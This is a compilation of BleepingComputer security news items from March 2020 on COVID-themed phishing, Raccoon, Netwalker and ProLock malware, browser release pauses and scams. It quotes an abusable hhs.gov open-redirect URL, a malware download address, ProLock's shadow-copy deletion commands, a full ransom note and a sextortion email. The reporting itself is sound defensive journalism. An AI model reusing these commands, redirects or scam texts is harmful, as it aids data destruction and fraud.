Update March 24, 14:17 EDT: Microsoft says that Windows 10 systems are not targeted in ongoing attacks exploiting the two critical RCE vulnerabilities.

The threat is low for those systems running Windows 10 due to mitigations that were put in place with the first version released in 2015. Please see the mitigation section for details. Microsoft is not aware of any attacks against the Windows 10 platform.

The possibility of remote code execution is negligible and elevation of privilege is not possible. We do not recommend that IT administrators running Windows 10 implement the workarounds described below.

Microsoft recommends upgrading to the Windows 10 family of clients and servers.


HHS.gov Open Redirect Used by Coronavirus Phishing to Spread Malware
28
.3.2020  Bleepingcomputer  Virus

An HHS.gov open redirect is currently being used by attackers to push malware payloads onto unsuspecting victims' systems with the help of coronavirus-themed phishing emails.

Open redirects are web addresses that automatically redirect users between a source website and a target site, and are regularly used by malicious actors to send their targets to phishing landing pages or to deliver malware payloads under the guise of legitimate services.

HHS.gov is the website of the U.S. Department of Health & Human Services which makes this specific open redirect the perfect tool to lure in potential victims.

The open redirect (https://dcis.hhs.gov/cas/login?service=MALICIOUSURL&gateway=true) is present on the subdomain of HHS's Departmental Contracts Information System, and it was discovered and shared on Twitter by infosec analyst @SecSome.

Phishing email sample
Phishing email sample (SecSome)
The attackers use it to link to a malicious attachment containing a coronavirus.doc.lnk file which will unpack an obfuscated VBS script that will download and execute a Raccoon information stealer malware payload from http://185.62.188[.]204/hunt/post/corona.exe (VirusTotal analysis) after saving it to %Temp%\HhKFW.exe.

Raccoon (aka Legion, Mohazo, and Racealer) is an information-stealing malware initially spotted almost a year ago on cybercriminal forums and capable of stealing data such as email credentials, credit card info, cryptocurrency wallets, browser data, and system information.

A report from CyberArk says that Raccoon is capable of digging its way into about 60 different applications, from browsers, cryptocurrency wallets, email and FTP clients to steal and deliver sensitive information to its operators.

After executing the infostealer, the script also makes use of a decoy that shows an error message to make the victim think there is something wrong with the malicious document.

Decoy error message
Decoy error message
The server used to previously deliver the malicious payload has since been taken down to probably be replaced with a new one very soon.

BleepingComputer has also been told that the U.S. Department of Health and Human Services (HHS) has been notified of the redirect and it will be hopefully taken offline soon.

While the current phishing campaign abusing HHS.gov open redirects only drops an infostealer as the final malware payload, it can be used to inflict much more damage if the threat actors ever decide to switch payloads.

As an extra tidbit of info, operators behind Netwalker Ransomware have used the same obfuscated VBS script template (in deobfuscated form here) to deliver their payloads in a campaign spotted by MalwareHunterTeam last week.

That series of attacks also used Coronavirus (COVID-19) phishing emails with attachments named 'CORONAVIRUS_COVID-19.vbs' containing an embedded Netwalker Ransomware executable as well as obfuscated code designed to extract and launch it on the compromised devices.

Coronavirus themed phishing and malware
To defend against similar attacks, you should always be suspicious of coronavirus related attachments, especially when received from unknown senders as there's currently a huge influx of malicious attacks using the current COVID-19 pandemic to steal personal information and deliver malware via phishing campaigns.

Additionally, always make sure that you have configured Windows Explorer to show file extensions for all file types as a lot of phishing attacks deliver malicious executables that pretend to be harmless docs. To do that uncheck the 'Hide extensions for known file types' in the File Explorer Options as shown in this tutorial.

Last month, the World Health Organization (WHO), the U.S. Federal Trade Commission (FTC), and the US Cybersecurity and Infrastructure Security Agency (CISA) have all warned about ongoing Coronavirus-themed phishing and cyberscams (1, 2, 3).


Google to Abandon Chrome 82 Development Due to Release Delays
28
.3.2020  Bleepingcomputer  Security

Due to the change in Google Chrome's release schedule because of the Coronavirus pandemic, Google has announced that they are no longer developing Chrome 82 and will skip to Chrome 83 instead.

Last week, Google announced that it was pausing releases of new milestone versions of the Chrome browser due to the adjusted employee work schedules during the Coronavirus outbreak.

This caused the Chrome 81 version that was scheduled for release on March 17th to not be released and stay in the Google Chrome Beta channel.

In a new post to the "Chromium Schedule Update" topic in the Chromium-dev discussion group, Jason Kersey, the Director of Technical Program Management at Google, announced that due to the schedule changes, they are going to abandon Chrome 82 altogether.

With this change, Google Chrome 81 (M81) will remain in the Beta until it is released on the Stable branch, Chrome 82 (M82) will be abandoned, and Chrome 83 (M83) will be moved to the development branch.

This is an update on our earlier decision to pause our branch and release schedule. As we adapt our future milestone schedules to the current change in schedule, we have decided to skip the M82 release to ensure we keep users safe and focus all efforts on maintaining stability.

Here are some of the immediate actions based on the above decision:

We will abandon current M82 branches, remove infra support, and stop testing/merges to the branches

We will not push any new M82 releases to Dev, and we will stop stabilization for Beta

We will move Dev channel to M83 asap

We will keep Beta channel on M81 until M83 is ready to be promoted

While it has not been specifically mentioned, it is assumed that Google Chrome 84 will move to Canary development branch over the next coming weeks.

These changes have not made as of yet and Chrome 82 is still in the Dev channel and Chrome 83 is still in the Canary channel.

Kersey states that there will be another update this week with more information about the upcoming changes.

At this time, Google has not officially announced when they will start releasing new versions of the browser, but if the schedule change lasts long enough, we could see further skipping of versions.


Windows Defender Bug in Windows 10 Skips Files During Scans
28
.3.2020  Bleepingcomputer  OS

For the past couple of weeks, Windows 10 users have been reporting that Windows Defender scans are skipping files due to a configured exclusion or network scanning setting.

The users who report receiving these messages, though, do not have any exclusions configured in the Windows Defender preferences.

Even still, when they conduct a Quick Scan or Full Scan using Windows Defender, a Windows 10 Action Center notification will be created that states that items were skipped during the scan with the following message:

Items skipped during scan
The Windows Defender Antivirus scan skipped an item due to an exclusion or network scanning settings.

In conversations with Günter Born who first reported it at BornCity, he told BleepingComputer that 80% of his German readers confirm the behavior, while 20% are not receiving it.

In tests conducted by BleepingComputer, were too were able to replicate the same reported issue as seen in the alert below when performing scans in Windows 10.

Action Center alert generated by Windows Defender Bug
Action Center alert generated by Windows Defender Bug
It is not clear when this issue started, but according to various reports [1, 2] it has been happening since around March 10th, 2020, which coincides with the March Patch Tuesday.

What is strange is that this issue is being reported under different Antimalware Client versions and does not affect everyone running the same engine version.

For example, in my tests, this issue was occurring in engine versions 4.18.2003.6. Others reported it is also occurring in version 4.18.2003.6-1.

Antimalware Client Version: 4.18.2003.6
Engine Version: 1.1.16800.2
Antivirus Version: 1.311.1767.0
Antispyware Version: 1.311.1767.0
After receiving the notification, I checked my exclusions and as you can see there are none configured.

No configured exclusions
No configured exclusions
To be 100% sure there were no hidden exclusions or strange network settings, I used the following PowerShell command to pull the Windows Defender preferences.

Get-MpPreference | findstr /i "net exc"
As you can see, we have no configured exclusions and our network settings are configured to the default preferences.

Exclusion and network preferences configured in Windows Defender
Exclusion and network preferences configured in Windows Defender
This is a strange bug to be sure as there appears to be no common denominator that can be seen in affected users.

BleepingComputer has contacted Microsoft about the bug but has not heard back at this time.


Israel Govt's New 'Shield' App Tracks Your Coronavirus Exposure
28
.3.2020  Bleepingcomputer  BigBrothers

The Israeli Ministry of Health has released a new mobile app called "The Shield" that will alert users if they have been at a location in Israel at the same time as a known Coronavirus patient.

This app, available for both Android and iOS, works by collecting the GPS and SSID (WiFi network) information of a user's mobile device throughout the day. This data is saved only on the mobile device and is not transmitted to the Ministry of Health, other government agencies, or any organization.

When interviewing new Coronavirus patients, the Ministry of Health will ask for the locations that they visited throughout the day. If the patient volunteers, this information is then added to a JSON file that is downloaded by the app every hour so it has the latest information.

When using the app, it will compare your data to the data in the downloaded JSON file and if the app detects that you were exposed to a known Coronavirus patient, it will alert you with a message stating that a match was found.

Location Match found
Location Match found
Matched users will then be prompted to report their exposure to the Ministry of Health using this link (English link).

If you have not been exposed to any known Coronavirus patients, the app will alert you of this as well.

No Exposure
Due to the nature of the data collection from patients, there may be false positives while using the app. Doctors, for example, who know that no Coronavirus patient was at a specific location can report these false positives so it can be corrected in the data file.

It is important to note that this app relies on known information about existing Coronavirus patients.

As many are carriers without any symptoms, the best preventative measure against the Coronavirus is to perform self-isolation, social distancing, wash your hands frequently, and to work from home if possible.

Collected data is only saved on the device
As this app requests a great deal of security permissions on Android and is tracking your location throughout the day, people are rightfully concerned about the privacy ramifications of this app.

To assure users that the collected data is only being stored locally, Israel's Ministry of Health has released the source code for the app on GitHub under the MIT license so that other countries can also utilize it.

To ease concerns, a security review of the app was also conducted by Israeli cybersecurity firm Profero.

In a telephone conversation with Profero CEO Omri Moyal, BleepingComputer was told that his company has reviewed the code for the app and has confirmed that no data is being transmitted from the device.

Moyal told BleepingComputer that all GPS and collected data are saved internally on the device and compared locally on the app to the JSON file being updated by the Ministry of Health.

If a user has been notified that they were in the same location as a known patient, the Ministry of Health is not automatically alerted and it is up to the user to volunteer that they have potentially been exposed and are now in self-quarantine.

This is further outlined in a post by Moyal and in the included infographic below that explains in Hebrew how the data is collected and used.

Infographic shared by Profero
Infographic shared by Profero
(Click to see full size)
Moyal emphasized that the goal is to get Israeli users to install the app and stay protected from being exposed to the Coronavirus. Due to this, careful attention has been made towards the privacy of users and only sharing information if the user specifically volunteers it.

In the future, Moyal told us that the app may ask users to voluntarily upload their GPS data if they have been exposed or are known to be infected with the virus. This could then be integrated into the app to add a greater degree of accuracy to its alerts.

It is not known if and when this feature will be added.


How to Make the Windows 10 Taskbar Completely Transparent
28
.3.2020  Bleepingcomputer  OS

Many users enjoy modifying their Windows 10 experience by changing user interface characteristics beyond what Microsoft intended. One popular mod is to make the Windows 10 taskbar completely transparent without any blur effects.

Out of the box, Windows 10 offers a Transparency setting that can be enabled under Settings > Personalization > Colors and then toggling on the 'Transparency effects' setting.

Windows 10 Color Settings
Windows 10 Color Settings
When enabled, though, you are left with an opaque experience where the color and text are shown through the taskbar, but it is not completely transparent as shown below.

Standard Windows 10 Transparency effects
Standard Windows 10 Transparency effects
Using the Windows Registry you can tweak it further so it becomes a bit more transparent by adding a DWORD (32-bit) value named UseOLEDTaskbarTransparency under the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced Registry key and settings its value to 1.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"UseOLEDTaskbarTransparency"=dword:00000001

This can be done via the Registry Editor using the following steps below:

As you cannot launch programs via Windows Search, we need to launch the Registry Editor via the Run: dialog. To do that, press the Windows key + the R key at the same time to open the Run: dialog and then type Regedit and press the OK button.
Windows will display a UAC prompt asking if you wish to allow the Registry Editor to make changes to the system. Press the Yes button to continue.
Navigate to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced key.
Right-click on Search and select New and then DWORD (32-bit) Value as shown below.
You will be prompted to enter the name of the new value. Type UseOLEDTaskbarTransparency and press Enter on the keyboard. Double-click on UseOLEDTaskbarTransparency and set the value to 1 and then press the OK button.
When done, you should have an UseOLEDTaskbarTransparency value set to 1 as shown in the image below.
UseOLEDTaskbarTransparency Value Created
UseOLEDTaskbarTransparency Value Created
You can now close the Registry Editor and restart Windows Explorer or restart your computer.
Now go back into Settings > Personalization > Colors and toggle the Transparency effects setting from On to Off and then back to On again for the Registry change to go into effect.

You will now find that the taskbar has become a bit more transparent, but there is still a noticeable overlay effect.

More transparency through a Registry tweak
More transparency through a Registry tweak
Going completely transparent
If you want to make your Windows 10 taskbar completely transparent, you will need to use a third-party program such as Classic Shell or TranslucentTB.

For this guide, we chose TranslucentTB as it is a small app whose only purpose is to make the taskbar completely transparent.

To get started, simply install the TranslucentTB app from the Microsoft Store and launch it. Once launched, it will automatically make your taskbar completely transparent.

Fully transparent taskbar using TranslucentTB
Fully transparent taskbar using TranslucentTB
When you couple this with a high-resolution desktop background, you can achieve a beautiful effect where your taskbar icons appear to float on top of the background.

TranslucentTB with Desktop Background
TranslucentTB with Desktop Background
Using TranslucentTB you can also configure it to automatically change the transparency effects of the taskbar as you perform different actions such as opening the Start Menu or use the search field.

For those looking to modify their Windows 10 desktop experience but are not ready for a complete overhaul, TranslucentTB is a great place to start.


Microsoft Pauses New Edge Browser Versions Due to Coronavirus
22
.3.2020  Bleepingcomputer  OS

Microsoft is pausing the releases of new major versions of the Edge browser, including version 81, to remain consistent with the Google Chrome releases, which were paused earlier this week.

Due to the Coronavirus pandemic, many companies including Google and Microsoft are having their employees work from home to prevent the spread of the virus. This also means that normal routines and the ability to respond to bugs or issues that may arise when a new version is released.

This past Tuesday, Google Chrome 81 was expected to be released to the Stable channel but was never released.

On Wednesday Google explained that they are pausing all future releases of the Chrome browser, including Chrome 81, during the Coronavirus outbreak. Google will continue, though, to provide new releases of Chrome 80 to fix security bugs that are discovered.

As Microsoft Edge follows the same release cycle as Google Chrome, Microsoft Tweeted Friday that they have decided to follow Google's lead and have paused all major releases of the Edge browser.

In a later post to the Microsoft Edge blog, Microsoft reiterated that the releases are now paused, but that they will continue releasing security and stability updates to Microsoft Edge 80.

In light of current global circumstances, the Microsoft Edge team is pausing updates to the Stable channel for Microsoft Edge. This means that Microsoft Edge 81 will not be promoted to Stable until we resume these updates.

We are making this change to be consistent with the Chromium project, which recently announced a similar pause due to adjusted schedules, and out of a desire to minimize additional impact to web developers and organizations that are similarly impacted.

We will continue to deliver security and stability updates to Microsoft Edge 80. Preview channels (Canary, Dev, and Beta) will continue to update on their usual schedule.

All builds in the preview channels, though, will continue to be updated and released as per their usual schedule.


Netwalker Ransomware Infecting Users via Coronavirus Phishing
22
.3.2020  Bleepingcomputer  Ransomware

As if people did not have enough to worry about, attackers are now targeting them with Coronavirus (COVID-19) phishing emails that install ransomware.

While we do not have access to the actual phishing email being sent, MalwareHunterTeam was able to find an attachment used in a new Coronavirus phishing campaign that installs the Netwalker Ransomware.

Netwalker is a ransomware formerly called Mailto that has become active recently as it targets the enterprise and government agencies. Two widely reported attacks related to Netwalker are the ones on the Toll Group and the Champaign Urbana Public Health District (CHUPD) in Illinois.

The new Netwalker phishing campaign is using an attachment named "CORONAVIRUS_COVID-19.vbs" that contains an embedded Netwalker Ransomware executable and obfuscated code to extract and launch it on the computer.

VBS Attachment
VBS Attachment
When the script is executed, the executable will be saved to %Temp%\qeSw.exe and launched.

Netwalker Executable
Netwalker Executable
Once executed, the ransomware will encrypt the files on the computer and append a random extension to encrypted file names.

Of particular interest, Head of SentinelLabs Vitali Kremez told BleepingComputer that this version of the ransomware specifically avoids terminating the Fortinet endpoint protection client.

When asked why they would do that, Kremez stated it may be to avoid detection.

"I suppose it might be because they have already disabled the anti-virus functionality directly from the customer admin panel; however, they do not want to trip an alarm by terminating the clients," Kremez told BleepingComputer.

When done, victims will find a ransom note named [extension]-Readme.txt that contains instructions on how to access the ransomware's Tor payment site to pay the ransom demand.

Netwalker Ransom Note
Netwalker Ransom Note
Unfortunately, at this time there is no known weakness in the ransomware that would allow victims to decrypt their files for free.

Instead, victims will need to either restore from backup or recreate the missing files.

Coronavirus attacks have become common
Due to the ongoing Coronavirus pandemic, threat actors have actively started using the outbreak as a theme for their phishing campaigns and malware.

We have seen the TrickBot trojan using text from Coronavirus related news stories to evade detection, a ransomware called CoronaVirus, the data-stealing FormBook malware spread through phishing campaigns, and even an email extortion campaign threatening to infect your family with Coronavirus.

This has led to the US Cybersecurity and Infrastructure Security Agency (CISA) to issue warnings about the rise of Coronavirus-themed scams and the World Health Organization (WHO) to release warnings of phishing scams impersonating their organization.

As threat actors commonly take advantage of topics that spread anxiety and fear, everyone must be more diligent than ever against suspicious emails and the promotion of programs from unknown sources.


UK Fintech Firm Finastra Hit By Ransomware, Shuts Down Servers
22
.3.2020  Bleepingcomputer  Ransomware

Finastra, a leading financial technology provider from the UK, announced that it had to take several servers offline following a ransomware attack detected earlier today.

The fintech company provides financial software and services to more than 9,000 customers of all sizes from 130 countries across the globe, including 90 of the top 100 banks globally.

Finastra also has over 10,000 employees working from 42 offices, including London, New York, and Toronto, and a $1.9 billion in revenues.

Servers taken offline following attack
Earlier today, Finastra discovered the incident after its security team spotted potentially anomalous activity on some of the company's systems.

They immediately turned off some of the servers offline and started an investigation with the help of a leading digital forensic firm.

"At this time, we strongly believe that the incident was the result of a ransomware attack and do not have any evidence that customer or employee data was accessed or exfiltrated, nor do we believe our clients’ networks were impacted," Finastra's Chief Operating Officer Tom Kilroy said.

Finastra is currently working to bring back its systems online and to resolve the issues caused by part of the servers on the company's network being shut down.

"While we have an industry-standard security program in place, we are conducting a rigorous review of our systems to ensure that our customer and employee data continues to be safe and secure," Kilroy added.

"We have also informed and are cooperating with the relevant authorities and we are in touch directly with any customers who may be impacted as a result of disrupted service."

Finastra takes data security very seriously, and we have committed to updating our stakeholders regularly and providing more information as soon as our investigation into this matter continues. - Tom Kilroy

Vulnerable Pulse Secure VPN and Citrix servers
While the method used by the attackers to infiltrate Finastra's network was not disclosed, cyber threat intelligence firm Bad Packets says that it previously detected Pulse Secure VPN servers unpatched against the CVE-2019-11510 vulnerability.

If successfully exploited, CVE-2019-11510 could enable remote unauthenticated attackers to compromise vulnerable VPN servers, gain access to all active users as well as their plain-text credential, and execute arbitrary commands.

Vulnerable Pulse Secure VPN servers were used as a point of entry by Sodinokibi (REvil) ransomware as part of an attack that took down the network of Travelex on December 31, 2019.

In January, the US Cybersecurity and Infrastructure Security Agency (CISA) alerted organizations to patch their Pulse Secure VPN servers to block attacks attempting to exploit this remote code execution (RCE) vulnerability.

Bad Packets

Bad Packets also states that, on January 11, Finastra also had four Citrix ADC (NetScaler) servers vulnerable to attacks targeting the critical CVE-2019-1978 vulnerability, a flaw that was actively exploited by hackers starting with January 17 to plant backdoors and block subsequent exploitation efforts.

According to reports, the City of Potsdam had to sever the administration servers' Internet connection after a cyberattack was able to take down Citrix ADC servers on the administration's network unpatched against the CVE-2019-1978 flaw.

Citrix released all the fixes needed to secure vulnerable Citrix Application Delivery Controller (ADC), Citrix Gateway, and Citrix SD-WAN WANOP appliances against the actively exploited CVE-2019-19781 vulnerability on January 24.

Bad Packets Report
@bad_packets
Replying to @bad_packets
Finastra also had four Citrix (NetScaler) servers vulnerable to CVE-2019-19781 on January 11, 2020.https://twitter.com/bad_packets/status/1216635462011351040 …

Bad Packets Report
@bad_packets
Replying to @bad_packets
Servers vulnerable to CVE-2019-19781 by country:
🇺🇸 United States: 9,880
🇩🇪 Germany: 2,510
🇬🇧 United Kingdom: 2,028
🇨🇭 Switzerland: 1,094
🇦🇺 Australia: 1,076
🇳🇱 Netherlands: 713
🇨🇦 Canada: 682
🇫🇷 France: 591
🇮🇹 Italy: 568
🇳🇴 Norway: 446
All others: 5,533https://docs.google.com/spreadsheets/d/1sJ8-cVyG4vFYq6-MGdapM1eAhUkoXIKlsmuzKdfD9Ys/edit?usp=sharing …

13
7:26 PM - Mar 20, 2020
Twitter Ads info and privacy
See Bad Packets Report's other Tweets


PwndLocker Fixes Crypto Bug, Rebrands as ProLock Ransomware
22
.3.2020  Bleepingcomputer  Ransomware

PwndLocker has rebranded as the ProLock Ransomware after fixing a crypto bug that allowed a free decryptor to be created.

At the beginning of March, we reported on a new ransomware called PwndLocker that was targeting enterprise networks and demanding ransoms ranging between $175,000 to over $660,000 depending on the size of the network.

Soon after, Michael Gillespie of ID Ransomware and Fabian Wosar of Emsisoft were able to discover a weakness in the ransomware that allowed them to create a free decryptor for victims to get their files back without paying the ransom.

Rebranded as ProLock Ransomware
After their initial failure, the developers rebranded their infection as ProLock Ransomware and have started to target corporate networks once again.

According to Sophos researcher PeterM, the new ProLock Ransomware is being distributed through a BMP image file being stored in C:\ProgramData named WinMgr.bmp. Embedded in this image is the ransomware executable.

This BMP file renders properly in an image viewer, as shown below, with only a few dots appearing in the upper right corner.

WinMgr.bmp
WinMgr.bmp
If you view it through a hex editor, though, you can see that it includes binary data embedded in it as well.

Hex Edit of WinMgr.bmp
Hex Edit of WinMgr.bmp
This binary data is then reassembled by a PowerShell script that injects it directly into memory

PowerShell Script
PowerShell Script
Peter stated that this attack has been seen against a few servers, but it is not quite known how they got access. It is suspected that the attackers gained access through exposed Remote Desktop services.

"They targeted a handful of servers. Not sure how they got in (yet) but I can see quite a few keygens and cracking tools on the network, probably just end up being an exposed RDP though :-)," Peter stated in a Tweet.

As the attackers have full access to the network, it is unsure why they are hiding the ransomware executable in a BMP image file.

It is most likely being done to evade detection by security software as it deployed throughout the network using tools like PowerShell Empire or PSExec.

ProLock encryption method
Otherwise, a ProLock encryption attack will be the same as the methods used by PwndLocker.

When launched it will clear the shadow volume copies on the machine so that they cannot be used to recover files

vssadmin.exe delete shadows /all /quiet
vssadmin.exe resize shadowstorage /for=D: /on=D: /maxsize=401MB
vssadmin.exe resize shadowstorage /for=D: /on=D: /maxsize=unbounded
It will then start encrypting files on the computer, while skipping any with the following extensions and files in operating system and common application folders.

.exe, .dll, .lnk, .ico, .ini, .msi, .chm, .sys, .hlf, .lng, .inf, .ttf, .cmd, .bat, .vhd, .bac, .bak, .wbc, .bkf, .set, .win, .dsk
When encrypting files it will append the extension .proLock to an encrypted file's name. For example. 1.doc will be encrypted and named 1.doc.proLock.

ProLock encrypted files
ProLock encrypted files
In each folder that has been scanned for files, ProLock will create a ransom note named [HOW TO RECOVER FILES].TXT that contain instructions on how to connect to a Tor for payment information.

ProLock Ransom Note
ProLock Ransom Note
As each ProLock ransomware executable is hard coded with a ransom amount assigned to a particular victim, from the sample we analyzed the ransom amounts continue to be high. This one was for 80 bitcoins or approximately $470,000.

ProLock Ransomware Tor Payment Site
ProLock Ransomware Tor Payment Site
Unfortunately, with this release the ransomware operators fixed their encryption flaw that made free decryption possible.

Victims will need to recover from backups instead or rebuild their files.

IOCS
Hashes:
WinMgr.bmp: a6ded68af5a6e5cc8c1adee029347ec72da3b10a439d98f79f4b15801abd7af0
Associated Files:
[HOW TO RECOVER FILES].TXT
C:\Programdata\WinMgr.xml
C:\Programdata\WinMgr.bmp
C:\Programdata\clean.bat
C:\Programdata\run.bat
ProLock Ransom Note:
Your files have been encrypted by ProLock Ransomware using RSA-2048 algorithm.

[.:Nothing personal just business:.]

No one can help you to restore files without our special decryption tool.

To get your files back you have to pay the decryption fee in BTC.
The final price depends on how fast you write to us.

1. Download TOR browser: https://www.torproject.org/
2. Install the TOR Browser.
3. Open the TOR Browser.
4. Open our website in the TOR browser: msaoyrayohnp32tcgwcanhjouetb5k54aekgnwg7dcvtgtecpumrxpqd.onion
5. Login using your ID xxx

***If you have any problems connecting or using TOR network:
contact our support by email chec1kyourf1les@protonmail.com.

[You'll receive instructions and price inside]

The decryption keys will be stored for 1 month.

We also have gathered your sensitive data.
We would share it in case you refuse to pay.

Decryption using third party software is impossible.
Attempts to self-decrypting files will result in the loss of your data.


Extortion Emails Threaten to Infect Your Family With Coronavirus
22
.3.2020  Bleepingcomputer  Spam

Sextortion scammers are now also attempting to capitalize on the COVID-19 pandemic by threatening their victims to infect their family with the SARS-CoV-2 virus besides revealing all their "dirty secrets".

If you have received such an email, it is important to know that this is just a scam and that no hacker has stolen your passwords or can infect you or your family with an actual real-life virus.

Just paying attention to their threats should be reason enough to discard their attempts at extortion and delete such emails immediately.

Sextortion emails were first seen in July 2018 when crooks started emailing potential victims and claiming that they have them recorded on video while they were browsing adult sites.

To increase their scam's credibility, the scammers also include the victims' passwords in some cases, leaked together with their email addresses as part of a previous data breach.

Coronavirus infection threats over email
The sextortion emails' subjects are in the "[YOUR NAME] : [YOUR PASSWORD]" form, presenting one of your passwords from the get-go as a proven tactic to catch the targets' attention and make them open the messages.

Next, the scammers attempt to send their victims into full panic mode by warning them that they know where they live, as well as "every dirty little secret" in their lives that will be exposed if $4,000 worth of bitcoins will not be paid within 24 hours.

These threats are also supplemented with the promise of infecting the target's entire family with the coronavirus as researchers at Sophos found.

Unfortunately for them, this is the part that absolutely ruins all their previous work at intimidating the victim given the laughable attempt to use a real-life coronavirus infection scare to incentivize their victims to pay a ransom over email.

"You hαve 24 hours τo maκe the ραyment. Ι hαve a unique pιxel withιn τhis email messαge, and rιght now, I κηοw thατ yοu hαve reαd thιs email," the crooks add.

Sextortion email
Sextortion email (ExecuteMalware)
Below you can find the full content of such an 'innovative' sextortion email as published by Sophos:

Subject: [YOUR NAME] : [YOUR PASSWORD]

I know every dιrτy liττle secreτ abοuτ your lιfe. To ρrove my poιnτ, tell me, does [REDACTED] ring αny bell το yοu? It was οηe οf yοur pαsswοrds.

Whαt dο Ι κnow αbοuτ you?

Tο sταrt with, I κηοw all of yοur passwords. I αm awαre of your whereαbοuτs, what yοu eaτ, wιth whοm you tαlk, every liττle τhing yοu do in α day.

What αm Ι cαpable οf dοιηg?

Ιf I wαηt, I cοuld eνen infect yοur whοle fαmily with τhe CοronαVirus, reνeαl all of yοur secrets. There αre cοunτless τhiηgs I cαn dο.

Whατ should yοu do?

Yοu need tο ραy me $4000. You'll mαke τhe ρayment viα Βiτcoiη τo the belοw-mentιοηed αddress. Ιf you dοn't knοw how tο do τhis, seαrch 'how tο buy bιτcoin' in Goοgle.
Βitcoin Address:
[REDACTED]
(Ιt is cAsE sensiτiνe, sο cοpy αηd ραste it)

You hαve 24 hours τo maκe the ραyment. Ι hαve a unique pιxel withιn τhis email messαge, and rιght now, I κηοw thατ yοu hαve reαd thιs email.

If I dο ηoτ geτ the paymenτ:

Ι wιll iηfect eνery member οf your family with τhe CοronαVιrus. No matter how smart yοu αre, belieνe me, ιf Ι waητ to αffect, Ι caη. Ι will also gο αheαd aηd reνeαl yοur secreτs. Ι will comρletely ruiη yοur lιfe.

Nonetheless, ιf I do geτ ραιd, Ι wιll erαse every lιτtle informατιοη I have αbοut yοu immediατely. You will never hear from me αgαιn. It ιs a nοn-ηegotιαble οffer, sο dοn't wαsτe my τιme αnd yours by reρlyiηg to thιs emαil.

Nikita
The scammers also attempt to bypass text matching email protection features by using Greek characters instead of Latin ones as seen above.

What's important to remember if you are on the receiving end of an anxiety-inducing campaign is that, despite all their threats, the scammers never gained access to any of your accounts and you have absolutely nothing to worry about.

Additionally, there is no chance in hell that they will ever be able to get close to you or your family; and the chances of their coronavirus infection threats becoming are even slimmer.

Instead of being alarmed by such gratuitous threats, you should go ahead and mark such emails as spam as soon as you receive them to help out your email service to detect them before they land in your inbox and automatically block them in the future


YouTube and Amazon Also Lowering Video Quality in Europe
22
.3.2020  Bleepingcomputer  IT

Following in the footsteps on Netflix, Amazon and YouTube have also agreed to lower the video streaming quality of their services to prevent European network infrastructure from becoming overburdened.

With people increasingly turning to the Internet for entertainment and information during the Coronavirus pandemic, the European Union has asked that streaming providers reduce the quality of its videos to standard definition (SD) to reduce the burden on Internet infrastructure.

"As a result of social distancing measures put in place across Europe to fight the Coronavirus pandemic, the demand for Internet capacity has increased, be it for teleworking, e-learning or entertainment purposes. This could put networks under strain at a moment when they need to be operational at the best possible level. In order to prevent congestion and to ensure the open Internet, Internal Market Commissioner Thierry Breton has called on the responsibility of streaming services, operators and users. Streaming platforms are advised to offer standard rather than high definition and to cooperate with telecom operators."

Yesterday, Netflix agreed to lower the bit rate of their streaming videos by 25% for the next 30 days.

Today, both Amazon and Google stated that they would also reduce the quality of streaming videos for their platforms as well.

"We support the need for careful management of telecom services to ensure they can handle the increased internet demand with so many people now at home full-time due to COVID-19. Prime Video is working with local authorities and Internet Service Providers where needed to help mitigate any network congestion, including in Europe where we’ve already begun the effort to reduce streaming bitrates whilst maintaining a quality streaming experience for our customers," a Prime Video spokesperson told BleepingComputer.

In a statement to Reuters, Google has also stated that they will reduce the quality of YouTube video to SD in or

"We are making a commitment to temporarily switch all traffic in the EU to standard definition by default," Google told Reuters.

While Netflix has stated that they plan to reduce the quality for only 30 days, there is a good chance that this reduction in quality will last longer if necessary.


Audible Stories Give Parents a Break With Free Audio Books for Children
22
.3.2020  Bleepingcomputer  IT

Audible has launched a new service called Audible Stories where children and teenagers can listen to a huge selection of stories in six different languages for free.

With the launch of their new service, Audible Stories says these audiobooks will be free for as long as school is out to help continue learning and take a break from these stressful times.

"For as long as schools are closed, we're open. Starting today, kids everywhere can instantly stream an incredible collection of stories, including titles across six different languages, that will help them continue dreaming, learning, and just being kids," Audible Stories states on their home page,

Included in this offer is a wide range of books ranging from elementary school stories to classic stories for teenagers in high school.

Some of the books available on Audible Stories
Some of the books available on Audible Stories
The available audiobooks include classics such as Winnie-the-Pooh and Stone Soup for younger kids to White Fang, The Call of the Wild, Brave New World, and Roots for the older ones.

With school out, these free audiobooks come at a great time as they not only can be fun to listen to for the whole family but can also give parents a break to get some work done.


FBI Warning: Phishing Emails Push Fake Govt Stimulus Checks
22
.3.2020  Bleepingcomputer  Phishing

FBI's Internet Crime Complaint Center (IC3) today warned of an ongoing phishing campaign delivering spam that uses fake government economic stimulus checks as bait to steal personal information from potential victims.

"Look out for phishing emails asking you to verify your personal information in order to receive an economic stimulus check from the government," IC3's alert says.

"While talk of economic stimulus checks has been in the news cycle, government agencies are not sending unsolicited emails seeking your private information in order to send you money."

The FBI issued another warning about a phishing scam impersonating the Internal Revenue Service (IRS) in 2008 and trying to steal tax payers' personal information using economic stimulus checks as bait.

CDC and WHO impersonators exploit the COVID-19 pandemic
Similar campaigns might also ask potential victims for donations to various charities, promise general financial relief and airline carrier refunds, as well as try to push fake COVID-19 cures, vaccines, and testing kits.

Other active phishing attacks are also taking advantage of the COVID-19 pandemic to infect victims with malware and harvest their personal info via spam impersonating the Centers for Disease Control and Prevention (CDC) and other similar organizations like the World Health Organization (WHO).

The FBI also says that scammers are also trying to sell products claiming to prevent, treat, diagnose, or cure the COVID-19 disease, as well counterfeit sanitizing products and personal protective equipment (PPE), including but not limited to N95 respirator masks, gloves, protective gowns, goggles, and full-face shields.

Possible types of COVID-19-themed scams and attacks as highlighted by U.S. Attorney Andrew Murray:

• Individuals or businesses selling fake cures for COVID-19.
• Online offers for vaccinations and test kits.
• Phishing emails or texts from entities posing as the World Health Organization (WHO) or the Centers for Disease Control and Prevention (CDC).
• Malware inserted in mobile apps designed to track the spread of COVID-19 that can steal information stored on devices.
• Malicious COVID-19 websites and apps that can gain and lock access to devices until a ransom payment is made.
• Solicitations for donations to fake charities or crowdfunding sites.

Phishing and scam defense
